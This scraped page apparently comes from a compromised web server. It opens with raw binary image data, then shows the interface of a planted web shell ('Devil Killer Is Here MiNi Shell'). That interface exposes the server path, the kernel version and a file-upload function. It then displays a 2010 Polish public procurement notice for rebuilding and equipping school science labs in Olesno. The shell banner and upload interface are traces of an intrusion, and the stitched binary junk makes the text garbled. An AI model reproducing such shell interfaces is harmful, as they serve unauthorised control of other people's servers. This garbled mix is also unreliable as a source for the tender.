JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100609/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100609/148631-N-2010.html

<p class="kh_header"><b>Olesno: Rozbudowa i wyposażenie pracowni w zakresie kształcenia nauk matematyczno - przyrodniczych  w Publicznym Gimnazjum nr 1 w Oleśnie</b><br>
<b>Numer ogłoszenia: 148631 - 2010; data zamieszczenia: 09.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Olesna , ul. Pieloka 21, 46-300 Olesno, woj. opolskie, tel. 034 3597841-44 w. 204, faks 034 3597283.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.olesno.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbudowa i wyposażenie pracowni w zakresie kształcenia nauk matematyczno - przyrodniczych  w Publicznym Gimnazjum nr 1 w Oleśnie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.1	Przedmiotem zamówienia w przetargu nieograniczonym jest:
Pracami, które przeprowadzone zostaną w ramach realizacji rzeczowej części przedmiotowego przedsięwzięcia objęte zostaną 3 pracownie Publicznego Gimnazjum nr 1 w Oleśnie - pracownia chemiczna, biologiczna oraz fizyczna, przy czym pracownia chemiczna przeznaczona została do rozbudowy oraz wyposażenia w nowoczesny sprzęt, a dwie pozostałe - biologiczna i fizyczna jedynie do wyposażenia w sprzęt i urządzenia, służące przeprowadzaniu ćwiczeń, doświadczeń, różnorodnych eksperymentów dydaktycznych z udziałem uczniów. 
W związku ze różnorodnością prac będących przedmiotem zamówienia Zamawiający dopuszcza składanie ofert częściowych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>20.1.	Zamawiający zastrzega sobie prawo udzielenia zamówień uzupełniających dotychczasowemu wykonawcy robót budowlanych, stanowiących nie więcej niż 50% wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień. Dotyczy to sytuacji, gdy w toku realizacji inwestycji ze względu na przeznaczenie i charakter przedmiotu zamówienia okaże się, że należy zwiększyć zakres ilościowy prac przewidzianych w dokumentacji techniczno - projektowej. W tym przypadku zamówienie zostanie udzielone w trybie z wolnej ręki po negocjacjach z dotychczasowym wykonawcą.
45110000-1 Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne
45300000-0 Roboty instalacyjne w  budynkach
45400000-1 Roboty wykończeniowe w zakresie obiektów budowlanych

30213100-6 Komputery przenośne
38519000-6 Różne kompozycje do mikroskopów
38652100-1 Projektory
39100000-3 Meble
39110000-6 Siedziska, krzesła i produkty z nimi związane, i ich części
39162100-6 Pomoce dydaktyczne
39162110-9 Sprzęt dydaktyczny</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.30.00.00-0, 45.40.00.00-1, 30.21.31.00-6, 38.51.90.00-6, 38.65.21.00-1, 39.10.00.00-3, 39.11.00.00-6, 39.16.21.00-6, 39.16.21.10-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 49.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> (nie dotyczy)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku udziału w postępowaniu zostanie dokonana w oparciu o zasadę: spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku udziału w postępowaniu zostanie dokonana w oparciu o zasadę: spełnia / nie spełnia.
Zadanie częściowe nr 1
- 	warunek spełnią wykonawcy, którzy wykonali w ciągu ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej dwie roboty w zakresie budowy, przebudowy lub remontu budynku o wartości co najmniej 75 % wartości kosztorysu ofertowego brutto każda 
Zadanie częściowe nr 2
- 	warunek spełnią wykonawcy, którzy wykonali w ciągu ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedną kompleksową dostawę materiałów dydaktycznych dla placówek oświatowych.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku udziału w postępowaniu zostanie dokonana w oparciu o zasadę: spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku udziału w postępowaniu zostanie dokonana w oparciu o zasadę: spełnia / nie spełnia.
Zadanie częściowe nr 1
- 	warunek spełnią wykonawcy, którzy przedstawią wykaz osób uczestniczących w realizacji postępowania w tym imię i nazwisko osoby, która będzie pełnić funkcję kierownika budowy, wraz z jej uprawnieniami budowlanymi w specjalności: 
- konstrukcyjno-budowlanej,
- instalacyjnej w zakresie instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych;
oraz zaświadczeniem z właściwej izby samorządu zawodowego potwierdzającym jej przynależność do izby na dzień składania ofert lub innego dokumentu, z którego wynika przynależność do ww. izby.
Zadanie częściowe nr 2
Brak szczegółowych warunków na potwierdzenie spełniania tego warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku udziału w postępowaniu zostanie dokonana w oparciu o zasadę: spełnia / nie spełnia.
- 	warunek spełnią wykonawcy, którzy przedstawią opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz ofertowy
Oświadczenie potwierdzające spełnianie warunków zawartych w art. 22 ust 1 ustawy.
Kosztorys ofertowy wykonawcy (Zamawiający dopuszcza możliwość złożenia kosztorysu w wersji uproszczonej) (zadanie częściowe nr 1)
Pełnomocnictwo (jeżeli dotyczy).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Istotna zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron wyrażoną na piśmie pod rygorem nieważności takiej zmiany. Zmiany mogą dotyczyć:
a)	terminu wykonania robót,
b)	zmiany wynagrodzenia w przypadku zmiany  w  przepisach o podatkach,
c)	zmiany osób występujących po stornie Zamawiającego i Wykonawcy w przypadku wystąpienia zdarzeń losowych z tym że osoby występujące po stornie Wykonawcy muszą spełniać warunki udziału w postępowania,
2.	Niedopuszczalna jest pod rygorem nieważności zmiana postanowień zawartej umowy oraz wprowadzenie nowych postanowień do umowy niekorzystnych dla Zamawiającego, jeżeli przy ich uwzględnianiu należałoby zmienić treść oferty, na podstawie, której dokonano wyboru Wykonawcy, chyba, ze konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://olesno.biuletyn.info.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba Zamawiającego.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.06.2010 godzina 11:30, miejsce: Siedziba Zamawiającego.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Dofinansowanie projektu w ramach Regionalnego Programu Operacyjnego Województwa Opolskiego, pod działanie 5.1.2, Wsparcie lokalnej infrastruktury edukacyjnej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie częściowe nr 1 : część ogólnobudowlana.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rozbudowa pracowni chemicznej - część budowlana
Pomieszczenia, które zostaną objęte pracami budowlanymi, prowadzonymi w ramach realizacji niniejszego projektu znajdują się na parterze Publicznego Gimnazjum nr 1 w Oleśnie. Ściany zewnętrzne tego obiektu wykonane są z cegły pełnej i mają grubość 75 cm. Ściany wewnętrzne mają analogiczną konstrukcję, przy czym ich grubość to 57 cm. Podłoga tych pomieszczeń wykonana jest z desek, ułożonych na legarach drewnianych i pokryta jest wykładziną PCV. Stropy również są drewniane, z podsufitką otynkowaną. Stan zarówno ścian, stropów, jak i podłogi określić należy jako dobry. Prace budowlane, prowadzone w obrębie pracowni chemicznej mieć będą na celu połączenie pomieszczenia, służącego dotychczas jako sala lekcyjna, o powierzchni 38,50 m kw. z sąsiadującym z nią gabinetem, o powierzchni 17,1 m kw. Umożliwi to rozebranie istniejącej ściany, dzielącej oba te pomieszczenia. Jest to ściana o grubości 15 cm, o konstrukcji lekkiej - gipsowo kartonowej. Oprócz rozebrania tej ściany przedmiotowy projekt przewiduje także wymianę drewnianych podłóg, istniejących obecnie w obu, łączonych ze sobą pomieszczeniach, ułożenie płytek ceramicznych na ścianach nowej pracowni, wymianę drzwi, prowadzących do tego pomieszczenia oraz instalację sufitu podwieszanego. 
Rzeczowa część przedmiotowego projektu rozpoczęta zostanie od przeprowadzenia niezbędnych prac rozbiórkowych, w obrębie sali lekcyjnej oraz sąsiadującego z nią gabinetu - na parterze budynku, mieszczącego Publiczne Gimnazjum nr 1 w Oleśnie. Wśród prac tych wymienić należy zadania, takie jak:
o	Rozebranie istniejącej ściany działowej, gipsowo - kartonowej, dzielącej salę lekcyjną oraz sąsiadujący z nią gabinet,
o	Skucie tynków na ścianach połączonych ze sobą pomieszczeń do wysokości 2 m od poziomu podłogi, celem przygotowania prawidłowego podłoża pod warstwę płytek ceramicznych,
o	Usunięcie starej warstwy farby na pozostałej części ścian - skrobanie, mycie,
o	Wykucie z muru starych drzwi wejściowych, prowadzących do dotychczasowych pomieszczeń - sali lekcyjnej oraz gabinetu,
o	Poszerzenie otworu drzwiowego w miejscu gabinetu, do szerokości 90 x 200 cm w świetle ościeżnicy,
o	Usunięcie z podłogi starej wykładziny PCV,
o	Rozebranie starej drewnianej podłogi - desek, wraz z legarami i zasypką,
o	Usunięcie materiału, pochodzącego z prac rozbiórkowych, przeprowadzonych w budynku Gimnazjum, wraz z ich wywiezieniem na teren składowiska.
Po przeprowadzeniu wymienionych prac rozbiórkowych wybrany przez Inwestora wykonawca przystąpi do realizacji robót budowlanych i wykończeniowych, wśród których przewidziano:
o	Wykonanie nowych posadzek cementowych, grubości 5,00 cm, zbrojonych siatką stalową zgrzewaną (przekrój prętów 3mm),
o	Wykonanie nowych tynków na ścianach - do wysokości 2,00 m od poziomu podłogi będą to tynki pod okładziny ścienne z płytek,
o	Ułożenie na ścianach, na wysokości do 2,00 m od poziomu podłogi płytek technicznych chemoodpornych typu gres, na kleju chemoodpornym, wraz z fugowaniem,
o	Wykonanie gładzi szpachlowych na ścianach ponad poziomem płytek ceramicznych,
o	Przyklejenie tapety z włókna szklanego, wraz z jej pomalowaniem farbami silikonowymi lub lateksowymi,
o	Wykonanie kasetonowego sufitu podwieszanego z płyt z włókien mineralnych o wysokiej odporności na wilgoć, z powierzchnią odporną na szorowanie za pomocą szczotek, z certyfikatem niepalności. Poszczególne kasetony, tworzące sufit mieć będą wymiary 60,00 x 60,00 x 1,50 cm i połączone będą ze sobą antykorozyjną konstrukcją ze stopów lekkich,
o	Montaż nowej stolarki drzwiowej - 2 szt. drzwi technicznych, antywłamaniowych klasy C, z odpornością ogniową EI60, wraz z kompletnym wyposażeniem, o wymiarach 90,00 x 200,00 cm.
 Prace w obrębie posadzki przebudowywanych pomieszczeń rozpoczęte zostaną od wypełnienia zagłębień w łukach sklepień stropu za pomocą kruszywa keramzytowego, wraz z wypoziomowaniem. W następnej kolejności wykonany zostanie podkład betonowy, z betonu B20, grubości 3,00 cm. Izolację przeciwwilgociową posadzki zapewni folia zbrojona chemoodporna, o grubości min.0,7 mm, a izolację cieplną warstwa płyt styropianowych, frezowanych, o grubości 6,00 cm. Posadzka wylana zostanie na 3 warstwach izolacyjnych (1 warstwa styropianu i 2 warstwy folii chemoodpornej). Będzie ona mieć grubość 5,00 cm, a jej zbrojenie wykonane zostanie z siatki stalowej zgrzewanej - 3,00 mm. Na wylanej posadzce betonowej wykonana zostanie chemoodporna membrana izolacyjna, wraz z zagruntowaniem na bazie żywic epoksydowych - 2 warstwy po ok. 1 mm grubości każda, z wyprowadzeniem w pionie na ściany min. 15,00 cm - pod cokoliki. Na posadzce oraz cokolikach ułożone zostaną ostatecznie chemoodporne płytki techniczne typu gres, spoinowane klejem chemoodpornym i fugowane fugą chemoodporną. 
Kolejność wykonywania poszczególnych prac, przewidzianych w ramach przedmiotowego projektu inwestycyjnego jest następująca:
o	Odgrodzenie - wydzielenie wewnątrz przebudowywanego obiektu placu budowy i zainstalowanie tablic informacyjnych,
o	Zainstalowanie sprzętu, maszyn i urządzeń budowy, przewidzianych do zastosowania przy wykonywaniu prac,
o	Urządzenie składowisk na materiały budowlane i okresowe składowanie gruzu,
o	Przeprowadzenie robót rozbiórkowych i demontażowych,
o	Przeprowadzenie robót murarskich i ciesielskich,
o	Przeprowadzenie robót posadzkarskich i izolacyjnych,
o	Przeprowadzenie robót tynkarskich,
o	Montaż stropu podwieszanego,
o	Układanie płytek na ścianach,
o	Układanie płytek na posadzce,
o	Montaż nowej stolarki drzwiowej,
Przeprowadzenie prac malarskich.
Oprócz wymienionych powyżej prac przedmiotowy projekt przewiduje także wykonanie niezbędnych instalacji:
o	Wentylacyjnej,
o	Wodno - kanalizacyjnej,
o	Gazową,
o	Elektrycznej.
Nawiew powietrza zewnętrznego do przebudowanej pracowni zapewni zespół konwektorów wentylatorowych. Montaż konwektorów umożliwia rezygnację z eksploatowanych dotychczas grzejników. Z kolei wywiew powietrza z pracowni zapewni specjalny wentylator ścienny, wyprowadzający powietrze specjalnym kanałem ponad dach obiektu. W czasie postoju wentylatora kanał pracował będzie grawitacyjnie. Prędkość obrotów wentylatora będzie ustawiana według bieżących wymagań użytkowników pracowni. Ilość powietrza nawiewanego szacuje się na 1.122 m sześć / godz., a wywiewanego na 920 m sześć. / godz.
Stoły rozstawione wewnątrz przebudowanej pracowni wyposażone będą w zlewy, do których doprowadzona będzie woda zimna i ciepła. Ścieki odprowadzane będą do kanalizacji sanitarnej. Wodociąg wykonany zostanie z rur miedzianych, a instalacja kanalizacyjna z rur PCV. Włączenie do istniejącej kanalizacji sanitarnej Gimnazjum nastąpi pod podłogą pracowni. Na odpływie ścieków zainstalowany zostanie neutralizator kwasów, o przepustowości 0,2 dm sześć / sekundę.
Konieczność wyposażenia stołów pracowni w palniki gazowe wymusza wykonanie instalacji gazowej. Przewidziano 6 szt. palników. Gaz zostanie do palników doprowadzony z istniejącej w budynku instalacji gazowej, rurami stalowymi, DN25, do kurka odcinającego. Od kurka rozprowadzenie wykonane zostanie z rur miedzianych, łączonych ze sobą poprzez lutowanie lutem twardym. Poziom zużycia gazu szacuje się na 1,5 m sześć / godz.
Zasilanie przebudowanej pracowni w energię elektryczną odbywać się będzie zalicznikowo z istniejącej rozdzielnicy, zabudowanej na parterze budynku Gimnazjum. Z rozdzielnicy tej wyprowadzone zostaną przewody zasilające do instalacji odbiorczych. Dla zabezpieczenia poszczególnych obwodów w rozdzielnicy zabudowane zostaną wyłączniki nadmiarowo prądowe dla gniazd wtykowych oraz dla oświetlenia. Napięcie sieci zasilającej wynosić będzie 400 / 230 V, a moc maksymalna części objętej przebudową wyniesie 2,6 kW. Oświetlenie zostało zaprojektowane i zostanie wykonane w oparciu o normę PN-EN 12464-1:2004, zapewnią je rastrowe oprawy jarzeniowe, nadsufitowe 2 x 36 W, IP 20.
3.2	Prace należy wykonać Prace należy wykonać zgodnie z obowiązującymi przepisami i normami dotyczącymi przedmiotu zamówienia.
3.3	Szczegółowy opis przedmiotu zamówienia określają dokumentacja projektowa, wytyczne wykonawcze z przedmiarami robót oraz specyfikacja techniczna wykonania i odbioru robót budowlanych. Dokumenty te są załącznikami do specyfikacji istotnych warunków zamówienia i są dostępne na stronie internetowej Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.00.00-1, 45.30.00.00-0, 45.40.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 49.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie częściowe nr 2: Zakup, dostawa i montaż wyposażenia naukowo - dydaktycznego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Charakterystyka sprzętu naukowo - dydaktycznego
Wyposażenie pracowni fizycznej:
Tablica interaktywna +projektor o krótkiej ogniskowej - 1 szt.
Komputer  - 1 szt.
Stół demonstracyjny dla nauczyciela  - 10 szt.
Stół szkolny uczniowski 3-osobowy,  - 1 szt.
Kanał zasilający podwieszany z instalacją elektryczną - 1 szt.
Krzesło szkolne uczniowskie   - 30 szt.
Biurko dla nauczyciela 1-szafkowe - 1 szt.
Krzesło obrotowe tapicerowane dla nauczyciela - 1 szt.
Tablica szkolna - akademicka - 1 szt.
Środki dydaktyczne do nauczania fizyki dla gimnazjum w komplecie - 1 szt.

